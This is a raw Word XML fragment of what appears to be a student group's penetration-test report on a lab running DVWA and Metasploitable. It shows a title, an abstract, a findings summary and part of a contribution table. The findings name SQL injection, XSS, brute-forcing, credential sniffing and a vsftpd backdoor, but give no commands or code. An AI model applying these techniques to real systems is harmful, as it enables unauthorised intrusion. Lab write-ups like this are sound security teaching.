                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>8971134</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00D03104" w14:paraId="15F03F28" w14:textId="77777777" w:rsidTr="00556FA6">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4628" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="0708D37D" w14:textId="7FEC4151"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Due Date:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r w:rsidR="002037A9">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>13</w:t>
                  </w:r>
                  <w:r w:rsidR="002037A9" w:rsidRPr="002037A9">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                      <w:vertAlign w:val="superscript"/>
                    </w:rPr>
                    <w:t>th</w:t>
                  </w:r>
                  <w:r w:rsidR="002037A9">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> June</w:t>
                  </w:r>
                  <w:r w:rsidR="00EE1BB6">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>, 2026</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4628" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="78A6113D" w14:textId="0BD3DF36"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Date Submitted:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r w:rsidR="002037A9">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>13</w:t>
                  </w:r>
                  <w:r w:rsidR="002037A9" w:rsidRPr="002037A9">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                      <w:vertAlign w:val="superscript"/>
                    </w:rPr>
                    <w:t>th</w:t>
                  </w:r>
                  <w:r w:rsidR="002037A9">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> June, 2026</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00D03104" w14:paraId="54229476" w14:textId="77777777" w:rsidTr="00556FA6">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9256" w:type="dxa"/>
                  <w:gridSpan w:val="2"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="3CB3ADE2" w14:textId="11CEF942"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Signature of Lecturer</w:t>
                  </w:r>
                  <w:r w:rsidR="00E609AE">
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:b/>
                      <w:color w:val="000099"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>:</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="4DA65925" w14:textId="77777777" w:rsidR="00D03104" w:rsidRDefault="00D03104" w:rsidP="00556FA6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35AB1585" w14:textId="3AEDA4C9" w:rsidR="00B05F59" w:rsidRPr="008A30CC" w:rsidRDefault="00B05F59" w:rsidP="008A30CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc231851421"/>
      <w:r w:rsidRPr="00B05F59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="618C957A">
          <v:rect id="_x0000_i1093" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB740C9" w14:textId="77777777" w:rsidR="00B05F59" w:rsidRDefault="00B05F59">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="53392735" w14:textId="7F654FE7" w:rsidR="00D23F0B" w:rsidRDefault="00231866" w:rsidP="00AB4533">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Title &amp; Abstract</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="7AC86351" w14:textId="77777777" w:rsidR="00CC3CE8" w:rsidRDefault="00CC3CE8" w:rsidP="00CC3CE8"/>
    <w:p w14:paraId="711F4916" w14:textId="3DC40266" w:rsidR="00CC3CE8" w:rsidRPr="00097425" w:rsidRDefault="00286C9C" w:rsidP="00CC3CE8">
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Project Title:</w:t>
      </w:r>
      <w:r w:rsidRPr="00097425">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00503CE5" w:rsidRPr="00097425">
        <w:t>Web Application Penetration Test on Damn Vulnerable Web Application (DVWA).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EBE214" w14:textId="3AE2F377" w:rsidR="008B58A6" w:rsidRPr="00097425" w:rsidRDefault="008B58A6" w:rsidP="00CC3CE8">
      <w:r w:rsidRPr="00097425">
        <w:t xml:space="preserve">For this project, </w:t>
      </w:r>
      <w:r w:rsidR="006015F2" w:rsidRPr="00097425">
        <w:t xml:space="preserve">we </w:t>
      </w:r>
      <w:r w:rsidRPr="00097425">
        <w:t xml:space="preserve">set up a controlled penetration test inside a fully isolated lab environment using VirtualBox. The setup follows a three-node architecture: a Kali Linux machine serves as the attacker, while two target systems include an Ubuntu server running the Damn Vulnerable Web Application (DVWA) and a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00097425">
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00097425">
        <w:t xml:space="preserve"> VM for broader network exploration. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB53BE2" w14:textId="0CE24983" w:rsidR="00CC3CE8" w:rsidRPr="00097425" w:rsidRDefault="006015F2" w:rsidP="00CC3CE8">
      <w:r w:rsidRPr="00097425">
        <w:t xml:space="preserve">The primary goal is to execute the ethical hacking phases, </w:t>
      </w:r>
      <w:r w:rsidR="008B58A6" w:rsidRPr="00097425">
        <w:t xml:space="preserve">starting with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008B58A6" w:rsidRPr="00097425">
        <w:t>footprinting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008B58A6" w:rsidRPr="00097425">
        <w:t xml:space="preserve"> and scanning, then moving into exploitation</w:t>
      </w:r>
      <w:r w:rsidRPr="00097425">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B58A6" w:rsidRPr="00097425">
        <w:t>to uncover common web vulnerabilities like SQL Injection (SQLi) and Cross-Site Scripting (XSS)</w:t>
      </w:r>
      <w:r w:rsidR="00102D4B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00102D4B" w:rsidRPr="00102D4B">
        <w:t>(OWASP Foundation, 2021)</w:t>
      </w:r>
      <w:r w:rsidR="008B58A6" w:rsidRPr="00097425">
        <w:t>. Everything runs on an internal NAT network to stay within the course's ethical and safety guidelines, so no public or production systems are ever at risk.</w:t>
      </w:r>
      <w:r w:rsidR="005F415B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F415B" w:rsidRPr="005F415B">
        <w:t>(Scarfone et al., 2008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BB24D6" w14:textId="570A2731" w:rsidR="00D23F0B" w:rsidRPr="00097425" w:rsidRDefault="00D23F0B" w:rsidP="00D03104">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p w14:paraId="6E3604C6" w14:textId="7806B125" w:rsidR="006015F2" w:rsidRDefault="006015F2" w:rsidP="00D03104">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Main Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E4A406" w14:textId="5F64880D" w:rsidR="00356D40" w:rsidRDefault="00120744" w:rsidP="00D03104">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>We</w:t>
      </w:r>
      <w:r w:rsidR="00356D40" w:rsidRPr="00356D40">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> found major security flaws, including unencrypted HTTP traffic with successful extraction of high-privilege credentials, and a complete compromise of the system using a backdoor of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00356D40" w:rsidRPr="00356D40">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00356D40" w:rsidRPr="00356D40">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> daemon. Active exploitation was used to confirm the vulnerabilities found during web-level testing, including SQL Injection and XSS. Moreover, no infrastructure hardening made it easy to enumerate services and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>brute-force</w:t>
      </w:r>
      <w:r w:rsidR="00356D40" w:rsidRPr="00356D40">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> login. The identified threats were directly addressed by implementing a multi-layered hardening strategy, effectively mitigating the threats by enforcing HTTPS, applying WAF-based filtering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00356D40" w:rsidRPr="00356D40">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> and implementing secure coding standards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330CE52C" w14:textId="77777777" w:rsidR="006015F2" w:rsidRPr="00097425" w:rsidRDefault="006015F2" w:rsidP="00D03104">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BE0D009" w14:textId="41A050FA" w:rsidR="00D23F0B" w:rsidRPr="00563392" w:rsidRDefault="00F6529F" w:rsidP="00D23F0B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Group Member Contribution Table:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9565" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1885"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="4410"/>
        <w:gridCol w:w="1470"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AA1B85" w:rsidRPr="00097425" w14:paraId="26644A7D" w14:textId="77777777" w:rsidTr="00213762">
        <w:trPr>
          <w:trHeight w:val="526"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1885" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="83CAEB" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0B51B520" w14:textId="5ABCC38A" w:rsidR="00AA1B85" w:rsidRPr="00097425" w:rsidRDefault="00AA1B85" w:rsidP="00D23F0B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00097425">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Student Number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="83CAEB" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="589E3F80" w14:textId="011F08AB" w:rsidR="00AA1B85" w:rsidRPr="00097425" w:rsidRDefault="00B769CC" w:rsidP="00D23F0B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00097425">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Full Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4410" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="83CAEB" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="49F6F827" w14:textId="1D9B38EE" w:rsidR="00AA1B85" w:rsidRPr="00097425" w:rsidRDefault="00B769CC" w:rsidP="00D23F0B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00097425">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Contribution Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="83CAEB" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="229AC42A" w14:textId="4130009C" w:rsidR="00AA1B85" w:rsidRPr="00097425" w:rsidRDefault="00B769CC" w:rsidP="00D23F0B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00097425">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Percentage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA1B85" w:rsidRPr="00097425" w14:paraId="3856AA2D" w14:textId="77777777" w:rsidTr="00213762">
        <w:trPr>
          <w:trHeight w:val="526"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1885" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="708A5EF8" w14:textId="0A7C7327" w:rsidR="00AA1B85" w:rsidRPr="00097425" w:rsidRDefault="008C7882" w:rsidP="00213762">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>8971134</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="076A4DD4" w14:textId="1E70E448" w:rsidR="00AA1B85" w:rsidRPr="00097425" w:rsidRDefault="008C7882" w:rsidP="00213762">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Raheel Ahmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="143869B4" w14:textId="444F992C" w:rsidR="00AA1B85" w:rsidRPr="00097425" w:rsidRDefault="00376AE6" w:rsidP="00D23F0B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00376AE6">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Footprinting</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00376AE6">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>, Reconnaissance, and Report Synthesis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="533BCDE5" w14:textId="3FF86C61" w:rsidR="00AA1B85" w:rsidRPr="00097425" w:rsidRDefault="00B769CC" w:rsidP="00213762">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00097425">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>20%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA1B85" w:rsidRPr="00097425" w14:paraId="4A7F88A1" w14:textId="77777777" w:rsidTr="00213762">
        <w:trPr>
          <w:trHeight w:val="526"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1885" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FCB4DF9" w14:textId="5D1064DC" w:rsidR="00AA1B85" w:rsidRPr="00097425" w:rsidRDefault="008C7882" w:rsidP="00213762">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>8890766</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="657B2A30" w14:textId="361E85ED" w:rsidR="00AA1B85" w:rsidRPr="00097425" w:rsidRDefault="008C7882" w:rsidP="00213762">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Ahan Sunil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="410E6075" w14:textId="6D5FFEC7" w:rsidR="00AA1B85" w:rsidRPr="00097425" w:rsidRDefault="00F96906" w:rsidP="00D23F0B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F96906">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Scanning, Enumeration, and Lab Infrastructure Setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F974D5B" w14:textId="265EA05A" w:rsidR="00AA1B85" w:rsidRPr="00097425" w:rsidRDefault="00B769CC" w:rsidP="00213762">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00097425">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>20%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA1B85" w:rsidRPr="00097425" w14:paraId="2C22598C" w14:textId="77777777" w:rsidTr="00213762">
        <w:trPr>
          <w:trHeight w:val="526"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1885" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19A969E6" w14:textId="20E22B96" w:rsidR="00AA1B85" w:rsidRPr="00097425" w:rsidRDefault="00213762" w:rsidP="00213762">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00097425">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>9072974</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13505521" w14:textId="1E86D919" w:rsidR="00AA1B85" w:rsidRPr="00097425" w:rsidRDefault="00213762" w:rsidP="00213762">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00097425">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Kishan </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00097425">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Dhanak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BDE8BCA" w14:textId="6C0B426F" w:rsidR="00AA1B85" w:rsidRPr="00097425" w:rsidRDefault="00F96906" w:rsidP="00D23F0B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F96906">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
